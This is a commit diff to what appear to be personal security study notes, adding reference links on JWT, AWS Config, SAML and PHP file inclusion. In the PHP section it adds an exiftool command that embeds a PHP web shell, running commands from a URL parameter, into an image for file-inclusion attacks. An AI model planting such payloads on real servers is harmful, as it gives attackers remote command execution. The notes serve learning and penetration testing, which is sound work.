Updates

rezen · Jul 26, 2021 · 1c5bc70 · 1c5bc70
1 parent 2316d32
commit 1c5bc70
Show file tree

Hide file tree

Showing 4 changed files with 22 additions and 2 deletions.
diff --git a/auth.md b/auth.md
@@ -57,4 +57,4 @@ OpenID Connect does both.
 - https://www.theidentitycookbook.com/2016/10/protect-bearer-tokens-using-proof-of.html
 - https://connect2id.com/learn/token-binding
 - https://infosec.mozilla.org/guidelines/iam/openid_connect.html
-
+- https://www.pingidentity.com/en/company/blog/posts/2019/jwt-security-nobody-talks-about.html
diff --git a/aws.md b/aws.md
@@ -137,6 +137,12 @@ Storing encryption keys in the cloud
 ## AWS Config
 - Run a set of checks against resources to ensure adherance to certain standards
 - $2 a rule
+- https://youtu.be/kErRv4YB_T4
+- https://www.youtube.com/watch?v=fBewaclMo2s
+- https://jupiterone.com/blog/we-turned-off-aws-config/
+- `AWS_REGION=us-west-1 aws configservice describe-config-rules`
+- List of AWS managed rules
+  - https://docs.aws.amazon.com/config/latest/developerguide/managed-rules-by-aws-config.html
 
 ## CloudTrail
 Think of it as the auditd of linux but for AWS

diff --git a/saml.md b/saml.md
@@ -1,4 +1,7 @@
 - https://www.youtube.com/watch?v=SvppXbpv-5k
 - https://owasp.org/www-project-cheat-sheets/cheatsheets/SAML_Security_Cheat_Sheet.html
 - https://github.com/jch/saml
-- https://www.samltool.com/index.php
+- https://www.samltool.com/index.php
+- https://duo.com/blog/the-beer-drinkers-guide-to-saml
+- https://epi052.gitlab.io/notes-to-self/blog/2019-03-07-how-to-test-saml-a-methodology/
+- https://gravitational.com/blog/how-saml-authentication-works/
diff --git a/security-php.md b/security-php.md
@@ -10,6 +10,17 @@
 - Don't forget about the null byte! `%00`
 - https://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
 - https://upshell.wordpress.com/2011/06/11/new-vulnerabilities-to-access-files-in-php/
+- https://websec.io/2012/09/05/A-Silent-Threat-PHP-in-EXIF.html
+
+### Inclusion with Images
+Sometimes you may have an `include` but you can add arbitrary PHP files. There may however be a place to add images and you can embed php in an image which gets executed if the image is included.
+
+```
+exiftool -documentname='<?php echo system(isset($_GET["c"]) ? $_GET["c"] : "ls -lah"); ?>' profile.jpg
+```
+
+
+
 
 Sometimes PHP is so terribly configured you can inject your code into the inclusion. 
 Here is an example of how you can pass a `sleep(10);` into a possible `include` which